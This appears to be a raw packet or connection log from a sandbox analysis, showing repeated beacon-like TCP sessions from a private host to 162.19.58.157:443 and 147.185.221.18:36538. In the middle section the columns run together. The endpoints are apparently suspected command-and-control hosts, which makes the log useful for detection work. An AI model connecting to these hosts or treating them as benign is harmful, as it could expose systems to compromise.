Oct 15, 2024 11:21:24.377378941 CEST  443          52486      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:24.379204035 CEST  52487        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:24.379256010 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:24.379317045 CEST  52487        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:24.379760027 CEST  52487        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:24.379777908 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:25.412741899 CEST  36538        52482      147.185.221.18   192.168.2.7
Oct 15, 2024 11:21:25.412844896 CEST  52482        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:25.418139935 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:25.419569016 CEST  52487        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:25.419589996 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:25.661881924 CEST  52482        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:25.664506912 CEST  52488        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:25.666937113 CEST  36538        52482      147.185.221.18   192.168.2.7
Oct 15, 2024 11:21:25.669502020 CEST  36538        52488      147.185.221.18   192.168.2.7
Oct 15, 2024 11:21:25.669572115 CEST  52488        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:25.700277090 CEST  52488        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:25.705143929 CEST  36538        52488      147.185.221.18   192.168.2.7
Oct 15, 2024 11:21:25.797770977 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:25.797880888 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:25.797966003 CEST  52487        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:25.800542116 CEST  52487        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:25.800571918 CEST  443          52487      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:27.807455063 CEST  52489        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:27.807574987 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:27.807668924 CEST  52489        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:27.807988882 CEST  52489        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:27.808026075 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:28.657427073 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:28.660726070 CEST  52489        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:28.660800934 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.008757114 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.008830070 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.008900881 CEST  52489        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:29.009234905 CEST  52489        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:29.009288073 CEST  443          52489      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.010593891 CEST  52490        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:29.010653019 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.010729074 CEST  52490        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:29.011008024 CEST  52490        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:29.011039019 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.899681091 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:29.901134014 CEST  52490        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:29.901217937 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:30.284216881 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:30.284285069 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:30.284368038 CEST  52490        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:30.326404095 CEST  52490        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:30.326473951 CEST  443          52490      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:32.335156918 CEST  52491        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:32.335288048 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:32.335412025 CEST  52491        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:32.335736990 CEST  52491        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:32.335787058 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.193646908 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.220288038 CEST  52491        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:33.220331907 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.575782061 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.575848103 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.575917006 CEST  52491        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:33.576351881 CEST  52491        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:33.576370001 CEST  443          52491      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.576917887 CEST  52492        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:33.577089071 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:33.577169895 CEST  52492        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:33.577471972 CEST  52492        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:33.577516079 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:34.181654930 CEST  36538        52488      147.185.221.18   192.168.2.7
Oct 15, 2024 11:21:34.181754112 CEST  52488        36538      192.168.2.7      147.185.221.18
Oct 15, 2024 11:21:34.441274881 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:34.443201065 CEST  52492        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:34.443290949 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:34.799861908 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:34.799999952 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:34.800072908 CEST  52492        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:34.800395012 CEST  52492        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:34.800496101 CEST  443          52492      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:36.802932978 CEST  52493        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:36.803023100 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:36.803143024 CEST  52493        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:36.803656101 CEST  52493        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:36.803698063 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:37.660480022 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:37.660718918 CEST  52493        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:37.662743092 CEST  52493        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:37.662781000 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:37.663038969 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:37.663997889 CEST  52493        443        192.168.2.7      162.19.58.157
Oct 15, 2024 11:21:37.711410046 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:38.020447016 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:38.020574093 CEST  443          52493      162.19.58.157    192.168.2.7
Oct 15, 2024 11:21:38.020649910 CEST  52493        443        192.168.2.7      162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:38.024388075 CEST52493443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:38.024437904 CEST44352493162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:49.503391027 CEST5248836538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:49.927131891 CEST5248836538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:50.026952028 CEST3653852488147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:50.027059078 CEST3653852488147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:50.027219057 CEST5248836538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:50.038228035 CEST5249436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:50.043135881 CEST3653852494147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:50.043224096 CEST5249436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:51.382297039 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:51.382356882 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:51.382463932 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:51.382858038 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:51.382877111 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.258721113 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.258830070 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.260634899 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.260665894 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.261028051 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.262140036 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.303440094 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.623637915 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.623713017 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.623790979 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.624306917 CEST52495443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:52.624326944 CEST44352495162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:54.634918928 CEST52496443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:54.634952068 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:54.635010004 CEST52496443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:54.638044119 CEST52496443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:54.638055086 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:55.495883942 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:55.501194954 CEST52496443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:55.501215935 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:55.854703903 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:55.854819059 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:55.854902029 CEST52496443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:58.553247929 CEST3653852494147.185.221.18192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:58.553793907 CEST5249436538192.168.2.7147.185.221.18
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.565655947 CEST52496443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.565715075 CEST44352496162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.602108002 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.602161884 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.602230072 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.602644920 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:21:59.602665901 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.604079008 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.604197979 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.605719090 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.605739117 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.606408119 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.607436895 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.655400038 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.981849909 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.982009888 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.982139111 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.999392033 CEST52497443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:01.999432087 CEST44352497162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.006306887 CEST52498443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.006371021 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.006464958 CEST52498443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.006892920 CEST52498443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.006921053 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.881714106 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.887187004 CEST52498443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:04.887214899 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.246768951 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.246825933 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.247082949 CEST52498443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.247415066 CEST52498443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.247442007 CEST44352498162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.247855902 CEST52499443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.247872114 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.249799967 CEST52499443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.250174046 CEST52499443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:05.250183105 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.108984947 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.125108004 CEST52499443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.125124931 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.481132030 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.481190920 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.481302023 CEST52499443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.481745958 CEST52499443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:06.481765985 CEST44352499162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:08.493751049 CEST52500443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:08.493808031 CEST44352500162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:08.497821093 CEST52500443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:08.498404980 CEST52500443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:08.498419046 CEST44352500162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:09.378395081 CEST44352500162.19.58.157192.168.2.7
Oct 15, 2024 11:22:09.378521919 CEST  52500  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.379964113 CEST  52500  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.379971027 CEST  443    52500  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.380295992 CEST  443    52500  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.381444931 CEST  52500  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.423424959 CEST  443    52500  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.740760088 CEST  443    52500  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.740910053 CEST  443    52500  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.741004944 CEST  52500  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.741434097 CEST  52500  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.741446018 CEST  443    52500  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.742830038 CEST  52501  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.742888927 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:09.742979050 CEST  52501  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.743366957 CEST  52501  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:09.743381977 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:10.620532990 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:10.622076035 CEST  52501  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:10.622114897 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:10.989919901 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:10.990062952 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:10.990175962 CEST  52501  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:10.990959883 CEST  52501  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:10.990978003 CEST  443    52501  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:12.865731955 CEST  52502  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:12.865787983 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:12.865953922 CEST  52502  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:12.866426945 CEST  52502  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:12.866442919 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:13.723094940 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:13.726174116 CEST  52502  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:13.726213932 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.080781937 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.080926895 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.081008911 CEST  52502  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:14.081418037 CEST  52502  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:14.081446886 CEST  443    52502  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.082315922 CEST  52503  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:14.082365990 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.082442045 CEST  52503  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:14.082711935 CEST  52503  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:14.082727909 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.947473049 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:14.949083090 CEST  52503  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:14.949110031 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:15.310749054 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:15.310874939 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:15.310926914 CEST  52503  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:15.315097094 CEST  52503  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:15.315114021 CEST  443    52503  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:18.214977980 CEST  52494  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:22:18.219789028 CEST  36538  52494  147.185.221.18  192.168.2.7
Oct 15, 2024 11:22:22.787173986 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:22.787283897 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:22.787415028 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:22.787893057 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:22.787925959 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:23.652817011 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:23.652961016 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:23.658840895 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:23.658858061 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:23.659272909 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:23.660406113 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:23.703418970 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.020042896 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.020119905 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.020313978 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:24.020807981 CEST  52504  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:24.020814896 CEST  443    52504  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.022944927 CEST  52505  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:24.023000956 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.023083925 CEST  52505  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:24.023432970 CEST  52505  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:24.023458004 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.882096052 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:24.883615017 CEST  52505  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:24.883661032 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:25.241589069 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:25.241662025 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:25.241802931 CEST  52505  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:25.242170095 CEST  52505  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:25.242211103 CEST  443    52505  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:26.881401062 CEST  52506  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:26.881472111 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:26.881690979 CEST  52506  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:26.882097006 CEST  52506  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:26.882131100 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:27.768136024 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:27.773684978 CEST  52506  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:27.773704052 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:28.152811050 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:28.152961016 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:28.153059959 CEST  52506  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:28.153436899 CEST  52506  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:28.153450966 CEST  443    52506  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:28.154016972 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:28.154129028 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:28.154206991 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:28.154460907 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:28.154496908 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:29.027189016 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:29.114901066 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:34.671673059 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:34.671710968 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:34.672995090 CEST  52508  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:22:34.677897930 CEST  36538  52508  147.185.221.18  192.168.2.7
Oct 15, 2024 11:22:34.678251982 CEST  52508  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:22:34.692373991 CEST  52508  36538  192.168.2.7     147.185.221.18
Oct 15, 2024 11:22:34.697277069 CEST  36538  52508  147.185.221.18  192.168.2.7
Oct 15, 2024 11:22:35.032063007 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:35.032129049 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:35.032186985 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:35.032949924 CEST  52507  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:35.032979965 CEST  443    52507  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:37.037328959 CEST  52509  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:37.037374973 CEST  443    52509  162.19.58.157   192.168.2.7
Oct 15, 2024 11:22:37.037441015 CEST  52509  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:37.037852049 CEST  52509  443    192.168.2.7     162.19.58.157
Oct 15, 2024 11:22:37.037861109 CEST  443    52509  162.19.58.157   192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.892651081 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.892767906 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.894128084 CEST52509443192.168.2.7162.19.58.157
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.894145012 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.894927025 CEST44352509162.19.58.157192.168.2.7
                                                                                                                                                                                                                                              Oct 15, 2024 11:22:37.896023989 CEST52509443192.168.2.7162.19.58.157
